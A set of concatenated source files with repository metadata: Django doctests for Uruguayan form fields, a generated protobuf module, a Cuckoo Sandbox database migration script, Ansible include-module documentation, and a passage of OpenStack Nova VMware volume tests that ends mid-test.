aprefontaine/TMScheduler | tests/regressiontests/forms/localflavor/uy.py | 14 | 2014 | # -*- coding: utf-8 -*-
# Tests for the contrib/localflavor/ UY form fields.
tests = r"""
# UYDepartamentSelect #########################################################
>>> from django.contrib.localflavor.uy.forms import UYDepartamentSelect
>>> f = UYDepartamentSelect()
>>> f.render('departamentos', 'S')
u'<select name="departamentos">\n<option value="G">Artigas</option>\n<option value="A">Canelones</option>\n<option value="E">Cerro Largo</option>\n<option value="L">Colonia</option>\n<option value="Q">Durazno</option>\n<option value="N">Flores</option>\n<option value="O">Florida</option>\n<option value="P">Lavalleja</option>\n<option value="B">Maldonado</option>\n<option value="S" selected="selected">Montevideo</option>\n<option value="I">Paysand\xfa</option>\n<option value="J">R\xedo Negro</option>\n<option value="F">Rivera</option>\n<option value="C">Rocha</option>\n<option value="H">Salto</option>\n<option value="M">San Jos\xe9</option>\n<option value="K">Soriano</option>\n<option value="R">Tacuaremb\xf3</option>\n<option value="D">Treinta y Tres</option>\n</select>'
# UYCIField ###################################################################
>>> from django.contrib.localflavor.uy.util import get_validation_digit
>>> get_validation_digit(409805) == 3
True
>>> get_validation_digit(1005411) == 2
True
>>> from django.contrib.localflavor.uy.forms import UYCIField
>>> f = UYCIField()
>>> f.clean('4098053')
u'4098053'
>>> f.clean('409805-3')
u'409805-3'
>>> f.clean('409.805-3')
u'409.805-3'
>>> f.clean('10054112')
u'10054112'
>>> f.clean('1005411-2')
u'1005411-2'
>>> f.clean('1.005.411-2')
u'1.005.411-2'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number in X.XXX.XXX-X,XXXXXXX-X or XXXXXXXX format.']
>>> f.clean('409805-2')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number.']
>>> f.clean('1.005.411-5')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number.']
"""
| bsd-3-clause | 3,891,448,946,487,106,000 | 42.782609 | 780 | 0.653426 | false |
earshel/PokeyPyManager | POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage_pb2.py | 16 | 4749 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Enums import Platform_pb2 as POGOProtos_dot_Enums_dot_Platform__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\nPPOGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\x1a\x1fPOGOProtos/Enums/Platform.proto\"\xaa\x01\n\"DownloadRemoteConfigVersionMessage\x12,\n\x08platform\x18\x01 \x01(\x0e\x32\x1a.POGOProtos.Enums.Platform\x12\x1b\n\x13\x64\x65vice_manufacturer\x18\x02 \x01(\t\x12\x14\n\x0c\x64\x65vice_model\x18\x03 \x01(\t\x12\x0e\n\x06locale\x18\x04 \x01(\t\x12\x13\n\x0b\x61pp_version\x18\x05 \x01(\rb\x06proto3')
,
dependencies=[POGOProtos_dot_Enums_dot_Platform__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_DOWNLOADREMOTECONFIGVERSIONMESSAGE = _descriptor.Descriptor(
name='DownloadRemoteConfigVersionMessage',
full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='platform', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.platform', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device_manufacturer', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.device_manufacturer', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device_model', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.device_model', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='locale', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.locale', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='app_version', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.app_version', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=159,
serialized_end=329,
)
_DOWNLOADREMOTECONFIGVERSIONMESSAGE.fields_by_name['platform'].enum_type = POGOProtos_dot_Enums_dot_Platform__pb2._PLATFORM
DESCRIPTOR.message_types_by_name['DownloadRemoteConfigVersionMessage'] = _DOWNLOADREMOTECONFIGVERSIONMESSAGE
DownloadRemoteConfigVersionMessage = _reflection.GeneratedProtocolMessageType('DownloadRemoteConfigVersionMessage', (_message.Message,), dict(
DESCRIPTOR = _DOWNLOADREMOTECONFIGVERSIONMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage)
))
_sym_db.RegisterMessage(DownloadRemoteConfigVersionMessage)
# @@protoc_insertion_point(module_scope)
| mit | 4,457,933,379,265,750,500 | 46.49 | 502 | 0.761845 | false |
chubbymaggie/CuckooSploit | utils/db_migration/versions/from_0_6_to_1_1.py | 6 | 14422 | # Copyright (C) 2010-2015 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
"""Database migration from Cuckoo 0.6 to Cuckoo 1.1.
Revision ID: 263a45963c72
Revises: None
Create Date: 2014-03-23 23:30:36.756792
"""
# Revision identifiers, used by Alembic.
revision = "263a45963c72"
mongo_revision = "1"
down_revision = None
import os
import sys
import sqlalchemy as sa
from datetime import datetime
try:
from dateutil.parser import parse
except ImportError:
print "Unable to import dateutil.parser",
print "(install with `pip install python-dateutil`)"
sys.exit()
try:
from alembic import op
except ImportError:
print "Unable to import alembic (install with `pip install alembic`)"
sys.exit()
try:
from pymongo.connection import Connection
from pymongo.errors import ConnectionFailure
except ImportError:
print "Unable to import pymongo (install with `pip install pymongo`)"
sys.exit()
sys.path.append(os.path.join("..", ".."))
import lib.cuckoo.core.database as db
from lib.cuckoo.common.config import Config
def upgrade():
    # BEWARE: be prepared for some really spaghetti code. To deal with SQLite limitations in Alembic we coded some workarounds.
    # Migrations are supported starting from Cuckoo 0.6 and Cuckoo 1.0; we need a way to figure out from which release
    # the migration starts because both schemas are missing alembic release versioning.
    # We check for the tags table to distinguish between Cuckoo 0.6 and 1.0.
conn = op.get_bind()
if conn.engine.dialect.has_table(conn.engine.connect(), "machines_tags"):
        # If this table exists we are on Cuckoo 1.0 or above.
# So skip SQL migration.
pass
else:
# We are on Cuckoo < 1.0, hopefully 0.6.
# So run SQL migration.
# Create table used by Tag.
op.create_table(
"tags",
sa.Column("id", sa.Integer(), primary_key=True),
sa.Column("name", sa.String(length=255), nullable=False, unique=True),
)
# Create secondary table used in association Machine - Tag.
op.create_table(
"machines_tags",
sa.Column("machine_id", sa.Integer, sa.ForeignKey("machines.id")),
sa.Column("tag_id", sa.Integer, sa.ForeignKey("tags.id")),
)
# Add columns to Machine.
op.add_column("machines", sa.Column("interface", sa.String(length=255), nullable=True))
op.add_column("machines", sa.Column("snapshot", sa.String(length=255), nullable=True))
# TODO: change default value, be aware sqlite doesn't support that kind of ALTER statement.
op.add_column("machines", sa.Column("resultserver_ip", sa.String(length=255), server_default="192.168.56.1", nullable=False))
# TODO: change default value, be aware sqlite doesn't support that kind of ALTER statement.
op.add_column("machines", sa.Column("resultserver_port", sa.String(length=255), server_default="2042", nullable=False))
# Deal with Alembic shit.
# Alembic is so ORMish that it was impossible to write code which works on different DBMS.
if conn.engine.driver == "psycopg2":
# We don"t provide a default value and leave the column as nullable because o further data migration.
op.add_column("tasks", sa.Column("clock", sa.DateTime(timezone=False),nullable=True))
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
conn.execute("update tasks set clock=added_on")
# Add the not null constraint.
op.alter_column("tasks", "clock", nullable=False, existing_nullable=True)
# Altering status ENUM.
            # This shit of raw SQL is here because alembic doesn't deal well with alter_column of ENUM type.
op.execute('COMMIT') # Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction.
conn.execute("ALTER TYPE status_type ADD VALUE 'completed'")
conn.execute("ALTER TYPE status_type ADD VALUE 'reported'")
conn.execute("ALTER TYPE status_type ADD VALUE 'recovered'")
conn.execute("ALTER TYPE status_type ADD VALUE 'running'")
conn.execute("ALTER TYPE status_type RENAME ATTRIBUTE success TO completed")
conn.execute("ALTER TYPE status_type DROP ATTRIBUTE IF EXISTS failure")
elif conn.engine.driver == "mysqldb":
# We don"t provide a default value and leave the column as nullable because o further data migration.
op.add_column("tasks", sa.Column("clock", sa.DateTime(timezone=False),nullable=True))
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
conn.execute("update tasks set clock=added_on")
# Add the not null constraint.
op.alter_column("tasks", "clock", nullable=False, existing_nullable=True, existing_type=sa.DateTime(timezone=False))
# NOTE: To workaround limitations in Alembic and MySQL ALTER statement (cannot remove item from ENUM).
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["added_on"] = item[12]
else:
d["added_on"] = parse(item[12])
if isinstance(item[13], datetime):
d["started_on"] = item[13]
else:
d["started_on"] = parse(item[13])
if isinstance(item[14], datetime):
d["completed_on"] = item[14]
else:
d["completed_on"] = parse(item[14])
d["status"] = item[15]
d["sample_id"] = item[16]
# Force clock.
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
d["clock"] = d["added_on"]
# Enum migration, "success" isn"t a valid state now.
if d["status"] == "success":
d["status"] = "completed"
tasks_data.append(d)
# Rename original table.
op.rename_table("tasks", "old_tasks")
# Drop old table.
op.drop_table("old_tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create new table with 1.0 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), server_default=sa.func.now(), nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
elif conn.engine.driver == "pysqlite":
# Edit task status enumeration in Task.
# NOTE: To workaround limitations in SQLite we have to create a temporary table, create the new schema and copy data.
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["added_on"] = item[12]
else:
d["added_on"] = parse(item[12])
if isinstance(item[13], datetime):
d["started_on"] = item[13]
else:
d["started_on"] = parse(item[13])
if isinstance(item[14], datetime):
d["completed_on"] = item[14]
else:
d["completed_on"] = parse(item[14])
d["status"] = item[15]
d["sample_id"] = item[16]
# Force clock.
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
d["clock"] = d["added_on"]
# Enum migration, "success" isn"t a valid state now.
if d["status"] == "success":
d["status"] = "completed"
tasks_data.append(d)
# Rename original table.
op.rename_table("tasks", "old_tasks")
# Drop old table.
op.drop_table("old_tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create new table with 1.0 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), server_default=sa.func.now(), nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
# Migrate mongo.
mongo_upgrade()
def mongo_upgrade():
"""Migrate mongodb schema and data."""
# Read reporting.conf to fetch mongo configuration.
config = Config(cfg=os.path.join("..", "..", "conf", "reporting.conf"))
# Run migration only if mongo is enabled as reporting module.
if config.mongodb.enabled:
host = config.mongodb.get("host", "127.0.0.1")
port = config.mongodb.get("port", 27017)
print "Mongo reporting is enabled, strarting mongo data migration."
# Connect.
try:
conn = Connection(host, port)
db = conn.cuckoo
except TypeError:
print "Mongo connection port must be integer"
sys.exit()
except ConnectionFailure:
print "Cannot connect to MongoDB"
sys.exit()
# Check for schema version and create it.
if "cuckoo_schema" in db.collection_names():
print "Mongo schema version not expected"
sys.exit()
else:
db.cuckoo_schema.save({"version": mongo_revision})
else:
print "Mongo reporting module not enabled, skipping mongo migration."
def downgrade():
# We don"t support downgrade.
pass
| gpl-3.0 | 793,602,748,365,122,200 | 47.558923 | 233 | 0.575163 | false |
brokenjacobs/ansible | lib/ansible/modules/utilities/logic/include.py | 50 | 2305 | #!/usr/bin/python
# -*- mode: python -*-
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
author:
- "Ansible Core Team (@ansible)"
module: include
short_description: include a play or task list.
description:
- Includes a file with a list of plays or tasks to be executed in the current playbook.
- Files with a list of plays can only be included at the top level, lists of tasks can only be included where tasks normally run (in play).
- Before 2.0 all includes were 'static', executed at play compile time.
- Static includes are not subject to most directives, for example, loops or conditionals, they are applied instead to each inherited task.
- Since 2.0 task includes are dynamic and behave more like real tasks. This means they can be looped, skipped and use variables from any source.
Ansible tries to auto detect this, use the `static` directive (new in 2.1) to bypass autodetection.
version_added: "0.6"
options:
free-form:
description:
- This module allows you to specify the name of the file directly w/o any other options.
notes:
- This is really not a module, though it appears as such, this is a feature of the Ansible Engine, as such it cannot be overridden the same way a
module can.
'''
EXAMPLES = """
# include a play after another play
- hosts: localhost
tasks:
- debug:
msg: "play1"
- include: otherplays.yml
# include task list in play
- hosts: all
tasks:
- debug:
msg: task1
- include: stuff.yml
- debug:
msg: task10
# dynamic include task list in play
- hosts: all
tasks:
- debug:
msg: task1
- include: "{{ hostvar }}.yml"
static: no
when: hostvar is defined
"""
RETURN = """
# this module does not return anything except plays or tasks to execute
"""
| gpl-3.0 | -6,607,312,639,857,545,000 | 30.575342 | 150 | 0.678959 | false |
gooddata/openstack-nova | nova/tests/unit/virt/vmwareapi/test_volumeops.py | 2 | 33206 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils.fixture import uuidsentinel
from oslo_vmware import exceptions as oslo_vmw_exceptions
from oslo_vmware import vim_util as vutil
from nova.compute import power_state
from nova.compute import vm_states
from nova import context
from nova import exception
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.image import fake as image_fake
from nova.tests.unit.virt.vmwareapi import fake as vmwareapi_fake
from nova.tests.unit.virt.vmwareapi import stubs
from nova.virt.vmwareapi import constants
from nova.virt.vmwareapi import driver
from nova.virt.vmwareapi import vm_util
from nova.virt.vmwareapi import volumeops
class VMwareVolumeOpsTestCase(test.NoDBTestCase):
def setUp(self):
super(VMwareVolumeOpsTestCase, self).setUp()
vmwareapi_fake.reset()
stubs.set_stubs(self)
self._session = driver.VMwareAPISession()
self._context = context.RequestContext('fake_user', 'fake_project')
self._volumeops = volumeops.VMwareVolumeOps(self._session)
self._image_id = image_fake.get_valid_image_id()
self._instance_values = {
'name': 'fake_name',
'uuid': uuidsentinel.foo,
'vcpus': 1,
'memory_mb': 512,
'image_ref': self._image_id,
'root_gb': 10,
'node': 'respool-1001(MyResPoolName)',
'expected_attrs': ['system_metadata'],
}
self._instance = fake_instance.fake_instance_obj(self._context,
**self._instance_values)
def _test_detach_disk_from_vm(self, destroy_disk=False):
def fake_call_method(module, method, *args, **kwargs):
vmdk_detach_config_spec = kwargs.get('spec')
virtual_device_config = vmdk_detach_config_spec.deviceChange[0]
self.assertEqual('remove', virtual_device_config.operation)
self.assertEqual('ns0:VirtualDeviceConfigSpec',
virtual_device_config.obj_name)
if destroy_disk:
self.assertEqual('destroy',
virtual_device_config.fileOperation)
else:
self.assertFalse(hasattr(virtual_device_config,
'fileOperation'))
return 'fake_configure_task'
with test.nested(
mock.patch.object(self._session, '_wait_for_task'),
mock.patch.object(self._session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
fake_device = vmwareapi_fake.DataObject()
fake_device.backing = vmwareapi_fake.DataObject()
fake_device.backing.fileName = 'fake_path'
fake_device.key = 'fake_key'
self._volumeops.detach_disk_from_vm('fake_vm_ref', self._instance,
fake_device, destroy_disk)
_wait_for_task.assert_has_calls([
mock.call('fake_configure_task')])
def test_detach_with_destroy_disk_from_vm(self):
self._test_detach_disk_from_vm(destroy_disk=True)
def test_detach_without_destroy_disk_from_vm(self):
self._test_detach_disk_from_vm(destroy_disk=False)
def _fake_call_get_object_property(self, uuid, result):
def fake_call_method(vim, method, vm_ref, prop):
expected_prop = 'config.extraConfig["volume-%s"]' % uuid
self.assertEqual('VirtualMachine', vm_ref._type)
self.assertEqual(expected_prop, prop)
return result
return fake_call_method
def test_get_volume_uuid(self):
vm_ref = vmwareapi_fake.ManagedObjectReference('VirtualMachine',
'vm-134')
uuid = '1234'
opt_val = vmwareapi_fake.OptionValue('volume-%s' % uuid, 'volume-val')
fake_call = self._fake_call_get_object_property(uuid, opt_val)
with mock.patch.object(self._session, "_call_method", fake_call):
val = self._volumeops._get_volume_uuid(vm_ref, uuid)
self.assertEqual('volume-val', val)
def test_get_volume_uuid_not_found(self):
vm_ref = vmwareapi_fake.ManagedObjectReference('VirtualMachine',
'vm-134')
uuid = '1234'
fake_call = self._fake_call_get_object_property(uuid, None)
with mock.patch.object(self._session, "_call_method", fake_call):
val = self._volumeops._get_volume_uuid(vm_ref, uuid)
self.assertIsNone(val)
def test_attach_volume_vmdk_invalid(self):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
instance = mock.MagicMock(name='fake-name', vm_state=vm_states.ACTIVE)
vmdk_info = vm_util.VmdkInfo('fake-path', constants.ADAPTER_TYPE_IDE,
constants.DISK_TYPE_PREALLOCATED, 1024,
'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref'),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(vm_util, 'get_vm_state',
return_value=power_state.RUNNING)
) as (get_vm_ref, get_volume_ref, get_vmdk_info,
get_vm_state):
self.assertRaises(exception.Invalid,
self._volumeops._attach_volume_vmdk, connection_info,
instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
self.assertTrue(get_vmdk_info.called)
get_vm_state.assert_called_once_with(self._volumeops._session,
instance)
@mock.patch.object(vm_util, 'get_vm_extra_config_spec',
return_value=mock.sentinel.extra_config)
@mock.patch.object(vm_util, 'reconfigure_vm')
def test_update_volume_details(self, reconfigure_vm,
get_vm_extra_config_spec):
volume_uuid = '26f5948e-52a3-4ee6-8d48-0a379afd0828'
device_uuid = '0d86246a-2adb-470d-a9f7-bce09930c5d'
self._volumeops._update_volume_details(
mock.sentinel.vm_ref, volume_uuid, device_uuid)
get_vm_extra_config_spec.assert_called_once_with(
self._volumeops._session.vim.client.factory,
{'volume-%s' % volume_uuid: device_uuid})
reconfigure_vm.assert_called_once_with(self._volumeops._session,
mock.sentinel.vm_ref,
mock.sentinel.extra_config)
def _fake_connection_info(self):
return {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_volume_uuid')
@mock.patch.object(vm_util, 'get_vmdk_backed_disk_device')
def test_get_vmdk_backed_disk_device(self, get_vmdk_backed_disk_device,
get_volume_uuid):
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
disk_uuid = mock.sentinel.disk_uuid
get_volume_uuid.return_value = disk_uuid
device = mock.sentinel.device
get_vmdk_backed_disk_device.return_value = device
vm_ref = mock.sentinel.vm_ref
connection_info = self._fake_connection_info()
ret = self._volumeops._get_vmdk_backed_disk_device(
vm_ref, connection_info['data'])
self.assertEqual(device, ret)
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_volume_uuid.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'])
get_vmdk_backed_disk_device.assert_called_once_with(hardware_devices,
disk_uuid)
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_volume_uuid')
@mock.patch.object(vm_util, 'get_vmdk_backed_disk_device')
def test_get_vmdk_backed_disk_device_with_missing_disk_device(
self, get_vmdk_backed_disk_device, get_volume_uuid):
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
disk_uuid = mock.sentinel.disk_uuid
get_volume_uuid.return_value = disk_uuid
get_vmdk_backed_disk_device.return_value = None
vm_ref = mock.sentinel.vm_ref
connection_info = self._fake_connection_info()
self.assertRaises(exception.DiskNotFound,
self._volumeops._get_vmdk_backed_disk_device,
vm_ref, connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_volume_uuid.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'])
get_vmdk_backed_disk_device.assert_called_once_with(hardware_devices,
disk_uuid)
def test_detach_volume_vmdk(self):
vmdk_info = vm_util.VmdkInfo('fake-path', 'lsiLogic', 'thin',
1024, 'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref',
return_value=mock.sentinel.vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref',
return_value=mock.sentinel.volume_ref),
mock.patch.object(self._volumeops,
'_get_vmdk_backed_disk_device',
return_value=mock.sentinel.device),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(self._volumeops, '_consolidate_vmdk_volume'),
mock.patch.object(self._volumeops, 'detach_disk_from_vm'),
mock.patch.object(self._volumeops, '_update_volume_details'),
) as (get_vm_ref, get_volume_ref, get_vmdk_backed_disk_device,
get_vmdk_info, consolidate_vmdk_volume, detach_disk_from_vm,
update_volume_details):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id':
'd11a82de-ddaa-448d-b50a-a255a7e61a1e'
}}
instance = mock.MagicMock(name='fake-name',
vm_state=vm_states.ACTIVE)
self._volumeops._detach_volume_vmdk(connection_info, instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
get_vmdk_backed_disk_device.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data'])
get_vmdk_info.assert_called_once_with(self._volumeops._session,
mock.sentinel.volume_ref)
consolidate_vmdk_volume.assert_called_once_with(
instance, mock.sentinel.vm_ref, mock.sentinel.device,
mock.sentinel.volume_ref, adapter_type=vmdk_info.adapter_type,
disk_type=vmdk_info.disk_type)
detach_disk_from_vm.assert_called_once_with(mock.sentinel.vm_ref,
instance,
mock.sentinel.device)
update_volume_details.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data']['volume_id'], "")
def test_detach_volume_vmdk_invalid(self):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
instance = mock.MagicMock(name='fake-name', vm_state=vm_states.ACTIVE)
vmdk_info = vm_util.VmdkInfo('fake-path', constants.ADAPTER_TYPE_IDE,
constants.DISK_TYPE_PREALLOCATED, 1024,
'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref',
return_value=mock.sentinel.vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(self._volumeops,
'_get_vmdk_backed_disk_device'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(vm_util, 'get_vm_state',
return_value=power_state.RUNNING)
) as (get_vm_ref, get_volume_ref, get_vmdk_backed_disk_device,
get_vmdk_info, get_vm_state):
self.assertRaises(exception.Invalid,
self._volumeops._detach_volume_vmdk, connection_info,
instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
get_vmdk_backed_disk_device.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data'])
self.assertTrue(get_vmdk_info.called)
get_vm_state.assert_called_once_with(self._volumeops._session,
instance)
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(vm_util, 'get_rdm_disk')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
def test_detach_volume_iscsi(self, detach_disk_from_vm, iscsi_get_target,
get_rdm_disk, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
device_name = mock.sentinel.device_name
disk_uuid = mock.sentinel.disk_uuid
iscsi_get_target.return_value = (device_name, disk_uuid)
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
device = mock.sentinel.device
